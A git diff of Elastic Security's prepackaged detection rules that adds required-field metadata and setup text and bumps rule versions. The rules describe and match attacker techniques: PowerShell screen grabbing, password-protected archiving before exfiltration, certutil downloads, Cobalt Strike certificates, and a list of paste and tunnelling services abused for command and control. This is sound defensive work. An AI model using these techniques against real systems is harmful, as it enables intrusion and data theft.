100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_screen_grabber.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_posh_screen_grabber.json @@ -11,13 +11,26 @@ "language": "kuery", "license": "Elastic License v2", "name": "PowerShell Suspicious Script with Screenshot Capabilities", - "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Screenshot Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, which makes\nit available for use in various environments and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities and take screen captures of desktops to gather information over the course\nof an operation.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the captured data locally.\n- Investigate if the script contains exfiltration capabilities and the destination of this exfiltration.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to take screenshots, which makes false\npositives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration > \nAdministrative Templates > \nWindows PowerShell > \nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", - "query": "event.category:process and \n powershell.file.script_block_text : (\n CopyFromScreen and\n (\"System.Drawing.Bitmap\" or \"Drawing.Bitmap\")\n )\n", + "note": "## Triage and analysis\n\n### Investigating PowerShell Suspicious Script with Screenshot Capabilities\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks, which makes\nit available for use in various environments and creates an attractive way for attackers to execute code.\n\nAttackers can abuse PowerShell capabilities and take screen captures of desktops to gather information over the course\nof an operation.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration\ncapabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine file or network events from the involved PowerShell process for suspicious behavior.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Evaluate whether the user needs to use PowerShell to complete tasks.\n- Investigate if the script stores the captured data locally.\n- Investigate if the script contains exfiltration capabilities and the destination of this exfiltration.\n- Assess network data to determine if the host communicated with the exfiltration server.\n\n### False positive analysis\n\n- Regular users do not have a business justification for using scripting utilities to take screenshots, which makes false\npositives unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Related rules\n\n- PowerShell Keylogging Script - bd2c86a0-8b61-4457-ab38-96943984e889\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "event.category:process and\n powershell.file.script_block_text : (\n CopyFromScreen and\n (\"System.Drawing.Bitmap\" or \"Drawing.Bitmap\")\n )\n", "references": [ "https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "unknown" + } + ], "risk_score": 47, "rule_id": "959a7353-1129-4aa7-9084-30746b256a70", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "medium", "tags": [ "Elastic", @@ -67,5 +80,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 4 + "version": 6 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_update_event_hub_auth_rule.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_update_event_hub_auth_rule.json index 7e8ab8d94d8f0..bcd3872f72992 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_update_event_hub_auth_rule.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_update_event_hub_auth_rule.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Event Hub Authorization Rule Created or Updated", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.EVENTHUB/NAMESPACES/AUTHORIZATIONRULES/WRITE\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/event-hubs/authorize-access-shared-access-signature" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "b6dce542-2b75-4ffb-b7d6-38787298ba9d", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -64,5 +89,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_winrar_encryption.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_winrar_encryption.json index 9b4fb9e87beb4..8a59df74a0755 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_winrar_encryption.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/collection_winrar_encryption.json @@ -12,13 +12,41 @@ "language": "eql", "license": "Elastic License v2", "name": "Encrypting Files with WinRar or 7z", - "note": "## Triage and analysis\n\n### Investigating Encrypting Files with WinRar or 7z\n\nAttackers may compress and/or encrypt data collected before exfiltration. Compressing the data can help obfuscate the\ncollected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is\nbeing exfiltrated from detection or make exfiltration less apparent upon inspection by a defender.\n\nThese steps are usually done in preparation for exfiltration, meaning the attack may be in its final stages.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the encrypted file.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the password used in the encryption was included in the command line.\n- Decrypt the `.rar`/`.zip` and check if the information is sensitive.\n- If the password is not available, and the format is `.zip` or the option used in WinRAR is not the `-hp`, list the\nfile names included in the encrypted file.\n- Investigate if the file was transferred to an attacker-controlled server.\n\n### False positive analysis\n\n- Backup software can use these utilities. Check the `process.parent.executable` and\n`process.parent.command_line` fields to determine what triggered the encryption.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Encrypting Files with WinRar or 7z\n\nAttackers may compress and/or encrypt data collected before exfiltration. Compressing the data can help obfuscate the\ncollected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is\nbeing exfiltrated from detection or make exfiltration less apparent upon inspection by a defender.\n\nThese steps are usually done in preparation for exfiltration, meaning the attack may be in its final stages.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Retrieve the encrypted file.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check if the password used in the encryption was included in the command line.\n- Decrypt the `.rar`/`.zip` and check if the information is sensitive.\n- If the password is not available, and the format is `.zip` or the option used in WinRAR is not the `-hp`, list the\nfile names included in the encrypted file.\n- Investigate if the file was transferred to an attacker-controlled server.\n\n### False positive analysis\n\n- Backup software can use these utilities. Check the `process.parent.executable` and\n`process.parent.command_line` fields to determine what triggered the encryption.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Prioritize cases that involve personally identifiable information (PII) or other classified data.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n ((process.name:\"rar.exe\" or process.code_signature.subject_name == \"win.rar GmbH\" or\n process.pe.original_file_name == \"Command line RAR\") and\n process.args == \"a\" and process.args : (\"-hp*\", \"-p*\", \"-dw\", \"-tb\", \"-ta\", \"/hp*\", \"/p*\", \"/dw\", \"/tb\", \"/ta\"))\n\n or\n (process.pe.original_file_name in (\"7z.exe\", \"7za.exe\") and\n process.args == \"a\" and process.args : (\"-p*\", \"-sdel\"))\n\n /* uncomment if noisy for backup software related FPs */\n /* not process.parent.executable : (\"C:\\\\Program Files\\\\*.exe\", \"C:\\\\Program Files (x86)\\\\*.exe\") */\n", "references": [ "https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.subject_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "45d273fb-1dca-457d-9855-bcb302180c21", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -53,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_certutil_network_connection.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_certutil_network_connection.json index e3c9edaf003dc..1aa0bd6168a51 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_certutil_network_connection.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_certutil_network_connection.json @@ -12,12 +12,34 @@ "language": "eql", "license": "Elastic License v2", "name": "Network Connection via Certutil", - "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources\nin order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in\n[IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Retrieve the downloaded file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified\nanything suspicious, this alert can be closed as a false positive.\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Network Connection via Certutil\n\nAttackers can abuse `certutil.exe` to download malware, offensive security tools, and certificates from external sources\nin order to take the next steps in a compromised environment.\n\nThis rule looks for network events where `certutil.exe` contacts IP ranges other than the ones specified in\n[IANA IPv4 Special-Purpose Address Registry](https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml)\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate if the downloaded file was executed.\n- Determine the context in which `certutil.exe` and the file were run.\n- Retrieve the downloaded file and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. If trusted software uses this command and the triage has not identified\nanything suspicious, this alert can be closed as a false positive.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "sequence by process.entity_id\n [process where process.name : \"certutil.exe\" and event.type == \"start\"]\n [network where process.name : \"certutil.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\",\n \"192.0.0.171/32\", \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\",\n \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\", \"100.64.0.0/10\", \"192.175.48.0/24\",\n \"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", "references": [ "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", "https://frsecure.com/malware-incident-response-playbook/" ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "3838e0e3-1850-4850-a411-2e8c5ba40ba8", "severity": "low", @@ -46,5 +68,5 @@ } ], "type": "eql", - "version": 8 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_cobalt_strike_default_teamserver_cert.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_cobalt_strike_default_teamserver_cert.json index 7934d803bd766..15bc6d4cbefa1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_cobalt_strike_default_teamserver_cert.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_cobalt_strike_default_teamserver_cert.json @@ -22,6 +22,28 @@ "https://www.elastic.co/guide/en/beats/filebeat/7.9/filebeat-module-suricata.html", "https://www.elastic.co/guide/en/beats/filebeat/7.9/filebeat-module-zeek.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "tls.server.hash.md5", + "type": "keyword" + }, + { + "ecs": true, + "name": "tls.server.hash.sha1", + "type": "keyword" + }, + { + "ecs": true, + "name": "tls.server.hash.sha256", + "type": "keyword" + } + ], "risk_score": 99, "rule_id": "e7075e8d-a966-458e-a183-85cd331af255", "severity": "critical", @@ -59,5 +81,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 6 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_common_webservices.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_common_webservices.json index 1b7b241c7febd..6de1031e27e2a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_common_webservices.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_common_webservices.json @@ -12,6 +12,33 @@ "name": "Connection to Commonly Abused Web Services", "note": "## Triage and analysis\n\n### Investigating Connection to Commonly Abused Web Services\n\nAdversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised\nsystem. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the\nlikelihood that hosts within a network are already communicating with them prior to a compromise.\n\nThis rule looks for processes outside known legitimate program locations communicating with a list of services that can\nbe abused for exfiltration or command and control.\n\n#### Possible investigation steps\n\n- Investigate the script execution chain (parent process tree) for unknown processes. Examine their executable files for\nprevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Verify whether the digital signature exists in the executable.\n- Identify the operation type (upload, download, tunneling, etc.).\n- Retrieve the process executable and determine if it is malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - File and registry access, modification, and creation activities.\n - Service creation and launch activities.\n - Scheduled tasks creation.\n - Use the PowerShell Get-FileHash cmdlet to get the files' SHA-256 hash values.\n - Search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives because it detects communication with legitimate services. Noisy\nfalse positives can be added as exceptions.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that\n attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n", "query": "network where network.protocol == \"dns\" and\n process.name != null and user.id not in (\"S-1-5-18\", \"S-1-5-19\", \"S-1-5-20\") and\n /* Add new WebSvc domains here */\n dns.question.name :\n (\n \"raw.githubusercontent.*\",\n \"*.pastebin.*\",\n \"*drive.google.*\",\n \"*docs.live.*\",\n \"*api.dropboxapi.*\",\n \"*dropboxusercontent.*\",\n \"*onedrive.*\",\n \"*4shared.*\",\n \"*.file.io\",\n \"*filebin.net\",\n \"*slack-files.com\",\n \"*ghostbin.*\",\n \"*ngrok.*\",\n \"*portmap.*\",\n \"*serveo.net\",\n \"*localtunnel.me\",\n \"*pagekite.me\",\n \"*localxpose.io\",\n \"*notabug.org\",\n \"rawcdn.githack.*\",\n \"paste.nrecom.net\",\n \"zerobin.net\",\n \"controlc.com\",\n \"requestbin.net\",\n \"cdn.discordapp.com\",\n \"discordapp.com\",\n \"discord.com\"\n ) and\n /* Insert noisy false positives here */\n not process.executable :\n (\n \"?:\\\\Program Files\\\\*.exe\",\n \"?:\\\\Program Files (x86)\\\\*.exe\",\n \"?:\\\\Windows\\\\System32\\\\WWAHost.exe\",\n \"?:\\\\Windows\\\\System32\\\\smartscreen.exe\",\n \"?:\\\\Windows\\\\System32\\\\MicrosoftEdgeCP.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Fiddler\\\\Fiddler.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Programs\\\\Microsoft VS Code\\\\Code.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\OneDrive.exe\",\n \"?:\\\\Windows\\\\system32\\\\mobsync.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\mobsync.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Discord\\\\app-*\\\\Discord.exe\"\n )\n", + "required_fields": [ + { + "ecs": true, + "name": "dns.question.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "66883649-f908-4a5b-a1e0-54090a1d3a32", "severity": "low", @@ -68,5 +95,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 9 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_connection_attempt_by_non_ssh_root_session.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_connection_attempt_by_non_ssh_root_session.json index 7cdba833a00e5..0a77195508bed 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_connection_attempt_by_non_ssh_root_session.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_connection_attempt_by_non_ssh_root_session.json @@ -14,12 +14,39 @@ "license": "Elastic License v2", "name": "Suspicious Network Connection Attempt by Root", "note": "## Triage and analysis\n### Investigating Connection Attempt by Non-SSH Root Session\nDetection alerts from this rule indicate a strange or abnormal outbound connection attempt by a privileged process. Here are some possible avenues of investigation:\n- Examine unusual and active sessions using commands such as 'last -a', 'netstat -a', and 'w -a'.\n- Analyze processes and command line arguments to detect anomalous process execution that may be acting as a listener.\n- Analyze anomalies in the use of files that do not normally initiate connections.\n- Examine processes utilizing the network that do not normally have network communication.\n", - "query": "sequence by process.entity_id with maxspan=1m\n[network where event.type == \"start\" and event.action == \"connection_attempted\" and user.id == \"0\" and \n not process.executable : (\"/bin/ssh\", \"/sbin/ssh\", \"/usr/lib/systemd/systemd\")]\n[process where event.action == \"session_id_change\" and user.id == \"0\"]\n", + "query": "sequence by process.entity_id with maxspan=1m\n[network where event.type == \"start\" and event.action == \"connection_attempted\" and user.id == \"0\" and \n not process.executable : (\"/bin/ssh\", \"/sbin/ssh\", \"/usr/lib/systemd/systemd\", \"/usr/sbin/sshd\")]\n[process where event.action == \"session_id_change\" and user.id == \"0\" and\n not process.executable : (\"/bin/ssh\", \"/sbin/ssh\", \"/usr/lib/systemd/systemd\", \"/usr/sbin/sshd\")]\n", "references": [ "https://www.sandflysecurity.com/blog/linux-file-masquerading-and-malicious-pids-sandfly-1-2-6-update/", "https://twitter.com/GossiTheDog/status/1522964028284411907", "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], "risk_score": 43, "rule_id": "eb6a3790-d52d-11ec-8ce9-f661ea17fbce", "severity": "medium", @@ -70,5 +97,5 @@ } ], "type": "eql", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_directly_to_the_internet.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_directly_to_the_internet.json deleted file mode 100644 index f57bd65b6d992..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/command_and_control_dns_directly_to_the_internet.json +++ /dev/null @@ -1,49 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "This rule detects when an internal network client sends DNS traffic directly to the Internet. This is atypical behavior for a managed network and can be indicative of malware, exfiltration, command and control, or simply misconfiguration. This DNS activity also impacts your organization's ability to provide enterprise monitoring and logging of DNS, and it opens your network to a variety of abuses and malicious communications.", - "false_positives": [ - "Exclude DNS servers from this rule as this is expected behavior. Endpoints usually query local DNS servers defined in their DHCP scopes, but this may be overridden if a user configures their endpoint to use a remote DNS server. This is uncommon in managed enterprise networks because it could break intranet name resolution when split horizon DNS is utilized. Some consumer VPN services and browser plug-ins may send DNS traffic to remote Internet destinations. In that case, such devices or networks can be excluded from this rule when this is expected behavior." - ], - "from": "now-9m", - "index": [ - "auditbeat-*", - "filebeat-*", - "packetbeat-*", - "logs-endpoint.events.*" - ], - "language": "kuery", - "license": "Elastic License v2", - 